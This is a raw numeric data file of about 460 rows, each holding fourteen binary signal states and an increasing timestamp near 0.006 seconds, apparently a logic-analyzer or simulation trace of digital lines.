0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8096200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8096440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8096680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8096920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8097160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8097400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8097680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8097920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8098200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8098440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8098680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8098920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8099160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8099400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8099680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8099920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8100200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8100440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8100680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8100920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8101160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8101400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8101680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8101920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8102200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8102440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8102680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8102920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8103160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8103400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8103680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8103920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8104200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8104440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8104680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8104920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8105160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8105400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8105680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8105920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8106200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8106440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8106680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8106920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8107160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8107400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8107680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8107920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8108200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8108440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8108680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8108920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8109160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8109400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8109680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8109920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8110200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8110440e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8110680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8110920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8111160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8111400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8111680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8111920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8112200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8112400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8112680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8112920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8113160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8113400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9359480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9361680e-03 1,0,1,1,1,0,0,0,0,0,0,1,0,1,5.9361960e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9362200e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,5.9365280e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,5.9365560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,1,5.9366000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,5.9366280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,1,5.9366320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9366360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,5.9366520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9366760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,5.9366800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,1,5.9367240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,5.9367480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,5.9367560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,5.9367760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9367800e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9368000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9368040e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9368520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9368760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9368840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9369000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9369240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9369320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9369760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9370000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9370080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9370280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9370520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9370760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9371000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9371240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9371480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9371760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9372000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9372040e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9372520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9372760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9372840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9373000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9373240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9373320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9373760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9374000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9374080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9374280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9374520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9374760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9375000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9375240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9375480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9375760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9376000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9376040e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9376520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9376760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9376840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9377000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9377240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9377320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9377760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9378000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9378080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9378280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9378520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9378760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9379000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9379240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9379480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9379760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9380000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9380040e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9380520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9380760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9380840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9381000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9381240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9381480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9381760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9382000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9382280e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9382520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9382760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9383000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9383240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9383480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9383760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9383800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9384280e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9384520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9384600e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9384760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9385000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9385240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9385480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9385560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9386000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9386280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,5.9386320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9386360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9386520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9386760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9387000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9387240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9387480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9387760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9388000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9388280e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9388520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9388760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9388800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9389240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9389480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9389560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9389760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9390000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9390280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9390520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9390760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9391000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9391240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9391480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9391560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9392000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9392280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,5.9392320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9392360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9392520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9392760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9392800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9393240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9393480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9393560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9394000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9394280e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9394760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9395000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9395520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9395760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9395800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9396280e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9396520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9396600e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9397000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9397240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9397480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9397760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9398000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9398280e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,5.9398760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,5.9399000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9399080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9399240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9399480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9399760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9400000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9400280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9400520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9400760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9401000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9401240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9401480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9401760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9402000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9402280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9402520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9402760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9403000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9403240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9403480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9403760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9404000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9404280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9404520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9404760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9405000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9405240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9405480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9405760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9406000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9406280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9406520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9406760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9407000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9407240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9407480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9407760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9408000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9408280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9408520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9408760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9409000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9409240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9409480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9409760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9410000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9410280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9410520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9410760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9411000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9411240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9411480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9411760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9412000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9412280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9412520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9412760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9413000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9413240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9413480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9413760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9414000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9414280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9414520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9414760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9415000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9415240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9415480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9415760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9416000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9416280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9416520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9416760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9417000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9417240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9417480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9417760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9418000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9418280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9418520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9418760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9419000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9419240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9419480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9419760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9420000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9420280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9420520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9420760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9421000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9421240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9421480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9421760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9422000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9422280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9422520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9422760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9423000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9423240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9423480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9423760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9424000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9424280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9424520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9424760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9425000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9425240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9425480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9425760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9426000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9426280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9426520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9426760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9427000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9427240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9427480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9427760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9428000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9428280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9428520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9428760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9429000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9429240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9429480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9429760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9430000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9430280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9430520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9430760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9431000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9431240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9431480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9431760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9432000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9432280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9432520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9432760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9433000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9433240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9433480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,5.9433760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,5.9434000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,6.0678520e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,6.0680640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,6.0680840e-03 0,1,1,1,1,0,0,0,0,0,0,1,0,1,6.0681160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,6.0681400e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,6.0684280e-03 0,1,1,1,1,0,0,0,0,1,0,0,0,1,6.0684520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,6.0684560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,1,6.0685000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,6.0685240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,6.0685320e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,6.0685480e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,6.0685800e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,1,6.0686280e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,6.0686520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,6.0686600e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,6.0686760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0686840e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0687000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0687080e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0687520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0687760e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,6.0687800e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0687840e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0688000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0688280e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0688760e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0689000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0689080e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0689240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0689480e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0689760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0690000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0690280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0690520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0691000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0691240e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0691320e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0691760e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0692040e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0692080e-03 